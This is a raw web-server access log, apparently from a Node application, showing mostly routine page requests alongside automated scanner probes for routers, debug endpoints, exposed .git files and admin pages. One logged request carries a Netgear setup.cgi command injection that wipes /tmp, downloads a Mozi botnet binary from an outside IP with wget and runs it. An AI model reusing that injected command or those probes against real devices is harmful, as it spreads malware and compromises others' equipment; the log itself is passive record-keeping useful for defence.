Server is running on port:  \\.\pipe\9e8d03d6-16bf-473d-8628-fcaac28063a4
[0mGET / [32m200[0m 65.008 ms - 31962[0m
[0mGET / [32m200[0m 20.967 ms - 31962[0m
[0mGET / [32m200[0m 14.874 ms - 31962[0m
[0mGET / [32m200[0m 14.349 ms - 31962[0m
[0mGET / [32m200[0m 17.146 ms - 31962[0m
[0mGET /cgi-bin/luci/;stok=/locale?form=country&operation=read [33m404[0m 13.532 ms - 165[0m
[0mGET / [32m200[0m 11.911 ms - 31962[0m
[0mGET /aaa9 [33m404[0m 8.089 ms - 143[0m
[0mGET /aab9 [33m404[0m 4.698 ms - 143[0m
[0mGET / [32m200[0m 12.150 ms - 31962[0m
[0mGET / [32m200[0m 11.816 ms - 31962[0m
[0mGET /assets/img/img_1.png [32m200[0m 9.398 ms - 4486[0m
[0mGET /favicon.ico [33m404[0m 3.607 ms - 150[0m
[0mGET /portal/redlion [33m404[0m 4.029 ms - 153[0m
[0mGET / [32m200[0m 11.797 ms - 31962[0m
[0mGET / [32m200[0m 11.545 ms - 31962[0m
[0mGET / [32m200[0m 12.428 ms - 31962[0m
[0mGET / [32m200[0m 12.966 ms - 31962[0m
[0mGET /?XDEBUG_SESSION_START=phpstorm [32m200[0m 13.092 ms - 31962[0m
[0mGET / [32m200[0m 11.190 ms - 31962[0m
[0mGET / [32m200[0m 12.385 ms - 31962[0m
[0mGET / [32m200[0m 12.763 ms - 31962[0m
[0mGET / [32m200[0m 12.243 ms - 31962[0m
[0mGET / [32m200[0m 49.067 ms - 31962[0m
[0mGET / [32m200[0m 13.089 ms - 31962[0m
[0mGET / [32m200[0m 12.000 ms - 31962[0m
[0mGET / [32m200[0m 9.986 ms - 31962[0m
[0mGET / [32m200[0m 11.993 ms - 31962[0m
[0mGET / [32m200[0m 12.344 ms - 31962[0m
[0mGET / [32m200[0m 12.132 ms - 31962[0m
[0mGET / [32m200[0m 10.648 ms - 31962[0m
[0mGET / [32m200[0m 12.098 ms - 31962[0m
[0mGET / [32m200[0m 12.269 ms - 31962[0m
[0mGET / [32m200[0m 11.841 ms - 31962[0m
[0mGET / [32m200[0m 10.603 ms - 31962[0m
[0mGET / [32m200[0m 11.397 ms - 31962[0m
[0mGET / [32m200[0m 12.024 ms - 31962[0m
[0mGET / [32m200[0m 11.954 ms - 31962[0m
[0mGET / [32m200[0m 10.684 ms - 31962[0m
[0mGET / [32m200[0m 11.762 ms - 31962[0m
[0mGET / [32m200[0m 13.025 ms - 31962[0m
[0mGET / [32m200[0m 12.638 ms - 31962[0m
[0mGET / [32m200[0m 10.939 ms - 31962[0m
[0mGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.91.170.161:52527/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 [33m404[0m 3.141 ms - 148[0m
[0mGET /actuator/gateway/routes [33m404[0m 3.077 ms - 162[0m
[0mGET / [32m200[0m 10.553 ms - 31962[0m
[0mGET / [32m200[0m 12.580 ms - 31962[0m
[0mGET / [32m200[0m 12.181 ms - 31962[0m
[0mGET / [32m200[0m 11.862 ms - 31962[0m
[0mGET / [32m200[0m 9.781 ms - 31962[0m
[0mGET /cgi-bin/luci/;stok=/locale?form=country&operation=read [33m404[0m 4.225 ms - 165[0m
[0mGET / [32m200[0m 10.730 ms - 31962[0m
[0mGET / [32m200[0m 12.497 ms - 31962[0m
[0mGET / [32m200[0m 12.995 ms - 31962[0m
[0mGET / [32m200[0m 11.907 ms - 31962[0m
[0mGET / [32m200[0m 10.403 ms - 31962[0m
[0mGET / [32m200[0m 11.874 ms - 31962[0m
[0mGET / [32m200[0m 12.264 ms - 31962[0m
[0mGET / [32m200[0m 11.800 ms - 31962[0m
[0mGET / [32m200[0m 10.505 ms - 31962[0m
[0mGET / [32m200[0m 10.893 ms - 31962[0m
undefined
[0mGET /agent-dashboard [36m302[0m 8.168 ms - 23[0m
[0mGET / [32m200[0m 11.891 ms - 31962[0m
[0mGET / [32m200[0m 12.114 ms - 31962[0m
[0mGET / [32m200[0m 10.586 ms - 31962[0m
[0mGET / [32m200[0m 10.425 ms - 31962[0m
[0mGET / [32m200[0m 12.067 ms - 31962[0m
[0mGET / [32m200[0m 12.062 ms - 31962[0m
[0mGET / [32m200[0m 10.570 ms - 31962[0m
[0mGET / [32m200[0m 11.773 ms - 31962[0m
[0mGET / [32m200[0m 12.460 ms - 31962[0m
[0mGET / [32m200[0m 12.117 ms - 31962[0m
[0mGET / [32m200[0m 10.625 ms - 31962[0m
[0mGET / [32m200[0m 11.703 ms - 31962[0m
[0mGET /.git/HEAD [33m404[0m 2.996 ms - 148[0m
[0mGET / [32m200[0m 12.262 ms - 31962[0m
[0mGET / [32m200[0m 12.139 ms - 31962[0m
[0mGET / [32m200[0m 11.370 ms - 31962[0m
[0mGET / [32m200[0m 10.687 ms - 31962[0m
[0mGET / [32m200[0m 12.244 ms - 31962[0m
[0mGET / [32m200[0m 12.141 ms - 31962[0m
[0mGET / [32m200[0m 10.498 ms - 31962[0m
[0mGET / [32m200[0m 11.729 ms - 31962[0m
[0mGET / [32m200[0m 12.200 ms - 31962[0m
[0mGET / [32m200[0m 11.708 ms - 31962[0m
[0mGET /cgi-bin/luci/;stok=/locale?form=country&operation=read [33m404[0m 2.896 ms - 165[0m
[0mGET / [32m200[0m 10.150 ms - 31962[0m
[0mGET /hlslive-tx-cdn.ysp.cctv.cn/069/2024078203.m3u8 [33m404[0m 2.853 ms - 185[0m
[0mGET /hlslive-tx-cdn.ysp.cctv.cn/ysp/2024078203.m3u8 [33m404[0m 4.535 ms - 185[0m
[0mGET /hlslive-tx-cdn.ysp.cctv.cn/028/2024068503.m3u8 [33m404[0m 2.777 ms - 185[0m
[0mGET /hlslive-tx-cdn.ysp.cctv.cn/ysp/2024068503.m3u8 [33m404[0m 2.811 ms - 185[0m
[0mGET / [32m200[0m 10.918 ms - 31962[0m
[0mGET / [32m200[0m 10.483 ms - 31962[0m
[0mGET / [32m200[0m 12.274 ms - 31962[0m
[0mGET / [32m200[0m 12.268 ms - 31962[0m
[0mGET / [32m200[0m 11.680 ms - 31962[0m
[0mGET / [32m200[0m 11.246 ms - 31962[0m
[0mGET / [32m200[0m 10.912 ms - 31962[0m
[0mGET /favicon.ico [33m404[0m 2.764 ms - 150[0m
[0mGET / [32m200[0m 13.378 ms - 31962[0m
[0mGET /manage/account/login [33m404[0m 2.825 ms - 159[0m
[0mGET /admin/index.html [33m404[0m 10.008 ms - 155[0m
[0mGET / [32m200[0m 10.522 ms - 31962[0m
[0mGET /index.html [33m404[0m 2.805 ms - 149[0m
